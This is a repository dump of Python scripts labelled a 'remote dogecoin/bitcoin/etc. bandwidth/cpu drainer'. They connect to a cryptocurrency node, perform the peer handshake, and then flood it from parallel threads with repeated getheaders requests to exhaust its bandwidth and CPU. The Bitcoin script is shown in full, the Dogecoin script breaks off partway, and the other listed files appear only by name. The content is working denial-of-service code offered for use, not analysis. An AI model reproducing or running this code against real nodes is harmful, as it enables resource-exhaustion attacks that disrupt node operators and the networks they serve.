├── drain-btc.py
├── drain-doge.py
├── drain-ltc.py
└── readme.md


/drain-btc.py:
--------------------------------------------------------------------------------
  1 | import sys
  2 | import socket
  3 | import struct
  4 | import time
  5 | import hashlib
  6 | import binascii
  7 | import os
  8 | from io import BytesIO
  9 | from concurrent.futures import ThreadPoolExecutor
 10 | import time
 11 | from colorama import init
 12 | 
 13 | init()
 14 | 
 15 | NODE_NETWORK = 1
 16 | total_mb_received = 0
 17 | 
 18 | def create_socket():
 19 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 20 |     s.connect(("PUT-YOUR-NODE-IP-HERE", 8333))
 21 |     return s
 22 | 
 23 | ascii = '''
 24 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣤⣴⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 25 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 26 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 27 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 28 | ⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀
 29 | ⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠉⠛⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀
 30 | ⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⢰⣿⣿⠇⠀⠉⠉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠀⠀⠀
 31 | ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠉⠉⠛⠛⠿⠿⡏⠀⠀⠀⣾⣿⡿⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀⠀
 32 | ⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⠃⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀
 33 | ⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀
 34 | ⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀
 35 | ⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣷⡄⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄
 36 | ⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
 37 | ⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠘⠿⠿⢿⣿⣿⡿⠟⠁⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 38 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 39 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⣴⣶⣤⣤⣀⡀⠀⠀⠀⠀⠀⠀⠐⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 40 | ⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 41 | ⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⢿⡿⠁⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
 42 | ⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃
 43 | ⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀
 44 | ⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀
 45 | ⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⣾⣿⣿⠀⠀⠀⢠⣤⣄⣀⣀⣀⣀⣤⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀
 46 | ⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⢰⣿⣿⡇⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀
 47 | ⠀⠀⠀⠀⠀⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣦⣾⣿⣿⡀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠀⠀⠀⠀⠀
 48 | ⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀
 49 | ⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀
 50 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 51 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 52 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 53 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠻⠿⠿⢿⣿⣿⣿⣿⣿⣿⡿⠿⠿⠟⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 54 | 
 55 | 
 56 |       remote dogecoin/bitcoin/etc. bandwidth/cpu drainer
 57 |       kevin mcsheehan (pad) april 2023 - twitter: @123456
 58 | '''
 59 | 
 60 | lines = ascii.split("\n")
 61 | 
 62 | def print_with_scroll_effect(lines):
 63 |     for line in lines:
 64 |         print(line)
 65 |         time.sleep(0.01)
 66 | 
 67 | def create_version_payload():
 68 |     version = 70016
 69 |     services = NODE_NETWORK
 70 |     timestamp = int(time.time())
 71 |     addr_recv = struct.pack('<Q16s', services, b'\x00' * 16)
 72 |     addr_from = struct.pack('<Q16s', services, b'\x00' * 16)
 73 |     nonce = 0
 74 |     user_agent = b'1'
 75 |     user_agent_length = len(user_agent)
 76 |     user_agent_length_compact = user_agent_length.to_bytes((user_agent_length.bit_length() + 7) // 8, 'little')
 77 |     start_height = 0
 78 |     relay = 1
 79 |     return struct.pack('<LQQ26s26sQ', version, services, timestamp, addr_recv, addr_from, nonce) + user_agent_length_compact + user_agent + struct.pack('<L?', start_height, relay)
 80 | 
 81 | def send_message(s, command, payload):
 82 |     magic = 0xD9B4BEF9
 83 |     command = command.encode('utf-8') + b'\x00' * (12 - len(command))
 84 |     length = len(payload)
 85 |     checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
 86 |     try:
 87 |         s.send(struct.pack('<L12sL4s', magic, command, length, checksum) + payload)
 88 |     except BrokenPipeError:
 89 |         time.sleep(0.00001)
 90 | 
 91 | def recv_message(s, thread_num):
 92 |     global total_mb_received
 93 |     magic, command, length, checksum = 0, b'', 0, b''
 94 |     try:
 95 |         magic, command, length, checksum = struct.unpack('<L12sL4s', s.recv(24))
 96 |     except struct.error:
 97 |         pass
 98 |     command = command.strip(b'\x00').decode('utf-8')
 99 |     payload = b''
100 |     while len(payload) < length:
101 |         chunk = s.recv(length - len(payload))
102 |         if not chunk:
103 |             break
104 |         payload += chunk
105 |     hex_payload = binascii.hexlify(payload[:50]).decode()
106 |     total_mb_received += len(payload) / (1024 * 1024)
107 |     print(f"[{thread_num}] {hex_payload} - {len(payload) / (1024 * 1024):.2f} MB - total: {total_mb_received:.2f} MB")
108 |     return command, payload
109 | 
110 | def create_getheaders_payload(num_headers=1999):
111 |     version = 77777
112 |     num_hashes = 1
113 |     start_hash = binascii.unhexlify("0000000000000000000287c1bdbfedb446c34097fd9b16f8caa2b2d233c0503e")[::-1]
114 |     stop_hash = binascii.unhexlify("0000000000000000000419a8efe1e50c5008383fb08c122d4f13cebf25875920")[::-1]
115 |     return struct.pack('<L', version) + struct.pack('<B', num_hashes) + start_hash + stop_hash
116 | 
117 | def process_headers(payload):
118 |     headers_data = BytesIO(payload)
119 |     num_headers = struct.unpack('<B', headers_data.read(1))[0]
120 |     headers = []
121 |     for _ in range(num_headers):
122 |         header = headers_data.read(80)
123 |         if len(header) < 80:
124 |             break
125 |         headers.append(header)
126 |     return headers
127 | 
128 | def print_headers(headers):
129 |     for header in headers:
130 |         break
131 | 
132 | def main(thread_num):
133 |     s = create_socket()
134 | 
135 |     version_payload = create_version_payload()
136 |     send_message(s, "version", version_payload)
137 | 
138 |     command, payload = recv_message(s, thread_num)
139 |     if command != "version":
140 |         print(f"debug: waiting ...")
141 |         sys.exit(1)
142 | 
143 |     send_message(s, "verack", b'')
144 | 
145 |     while True:
146 |         getheaders_payload = create_getheaders_payload()
147 |         send_message(s, "getheaders", getheaders_payload)
148 | 
149 |         try:
150 |             command, payload = recv_message(s, thread_num)
151 |             if command != "headers":
152 |                 raise Exception(f"did not receive headers message on socket {s}")
153 |         except Exception as e:
154 |             continue
155 | 
156 |         headers = process_headers(payload)
157 |         print_headers(headers)
158 | 
159 | if __name__ == "__main__":
160 |     try:
161 |         print_with_scroll_effect(lines)
162 |         num_threads = int(input("enter amount of parallel threads: "))
163 |         with ThreadPoolExecutor(max_workers=num_threads) as executor:
164 |             for i in range(num_threads):
165 |                 executor.submit(main, i)
166 |     except KeyboardInterrupt:
167 |         print("\nquit")
168 |         sys.exit(0)
169 | 


--------------------------------------------------------------------------------
/drain-doge.py:
--------------------------------------------------------------------------------
  1 | import sys
  2 | import socket
  3 | import struct
  4 | import time
  5 | import hashlib
  6 | import binascii
  7 | import os
  8 | from io import BytesIO
  9 | from concurrent.futures import ThreadPoolExecutor
 10 | import time
 11 | from colorama import init
 12 | 
 13 | init()
 14 | 
 15 | NODE_NETWORK = 1
 16 | total_mb_received = 0
 17 | 
 18 | def create_socket():
 19 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 20 |     s.connect(("PUT-YOUR-NODE-IP-HERE", 22556))
 21 |     return s
 22 | 
 23 | ascii = '''
 24 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣤⣴⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 25 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 26 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 27 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 28 | ⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀
 29 | ⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠉⠛⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀
 30 | ⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⢰⣿⣿⠇⠀⠉⠉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠀⠀⠀
 31 | ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠉⠉⠛⠛⠿⠿⡏⠀⠀⠀⣾⣿⡿⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀⠀
 32 | ⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⠃⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀
 33 | ⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀
 34 | ⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀
 35 | ⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣷⡄⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄
 36 | ⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
 37 | ⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠘⠿⠿⢿⣿⣿⡿⠟⠁⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 38 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 39 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⣴⣶⣤⣤⣀⡀⠀⠀⠀⠀⠀⠀⠐⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 40 | ⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 41 | ⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⢿⡿⠁⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
 42 | ⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃
 43 | ⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀
 44 | ⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀
 45 | ⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⣾⣿⣿⠀⠀⠀⢠⣤⣄⣀⣀⣀⣀⣤⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀
 46 | ⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⢰⣿⣿⡇⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀
 47 | ⠀⠀⠀⠀⠀⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣦⣾⣿⣿⡀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠀⠀⠀⠀⠀
 48 | ⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀
 49 | ⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀
 50 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 51 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 52 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 53 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠻⠿⠿⢿⣿⣿⣿⣿⣿⣿⡿⠿⠿⠟⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 54 | 
 55 | 
 56 |       remote dogecoin/bitcoin/etc. bandwidth/cpu drainer
 57 | 
 58 |       kevin mcsheehan (pad) april 2023 - twitter: @123456
 59 | '''
 60 | 
 61 | lines = ascii.split("\n")
 62 | 
 63 | def print_with_scroll_effect(lines):
 64 |     for line in lines:
 65 |         print(line)
 66 |         time.sleep(0.01)
 67 | 
 68 | def create_version_payload():
 69 |     version = 99999
 70 |     services = NODE_NETWORK
 71 |     timestamp = int(time.time())
 72 |     addr_recv = struct.pack('<Q16s', services, b'\x00' * 16)
 73 |     addr_from = struct.pack('<Q16s', services, b'\x00' * 16)
 74 |     nonce = 0
 75 |     user_agent = '1'.encode('utf-8')
 76 |     user_agent_length = len(user_agent)
 77 |     user_agent_length_compact = user_agent_length.to_bytes((user_agent_length.bit_length() + 7) // 8, 'little')
 78 |     start_height = 0
 79 |     relay = 1
 80 |     return struct.pack('<LQQ26s26sQ', version, services, timestamp, addr_recv, addr_from, nonce) + user_agent_length_compact + user_agent + struct.pack('<L?', start_height, relay)
 81 | 
 82 | def send_message(s, command, payload):
 83 |     magic = 0xC0C0C0C0
 84 |     command = command.encode('utf-8') + b'\x00' * (12 - len(command))
 85 |     length = len(payload)
 86 |     checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
 87 |     try:
 88 |         s.send(struct.pack('<L12sL4s', magic, command, length, checksum) + payload)
 89 |     except BrokenPipeError:
 90 |         time.sleep(0.00001)
 91 | 
 92 | def recv_message(s, thread_num):
 93 |     global total_mb_received
 94 |     magic, command, length, checksum = 0, b'', 0, b''
 95 |     try:
 96 |         magic, command, length, checksum = struct.unpack('<L12sL4s', s.recv(24))
 97 |     except struct.error:
 98 |         pass
 99 |     command = command.strip(b'\x00').decode('utf-8')
100 |     payload = b''
101 |     while len(payload) < length:
102 |         chunk = s.recv(length - len(payload))
103 |         if not chunk:
104 |             break
105 |         payload += chunk
106 |     hex_payload = binascii.hexlify(payload[:50]).decode()
107 |     total_mb_received += len(payload) / (1024 * 1024)
108 |     print(f"[{thread_num}] {hex_payload} - {len(payload) / (1024 * 1024):.2f} MB - total: {total_mb_received:.2f} MB")
109 |     return command, payload
110 | 
111 | def create_getheaders_payload(num_headers=1999):
112 |     version = 77777
113 |     num_hashes = 1
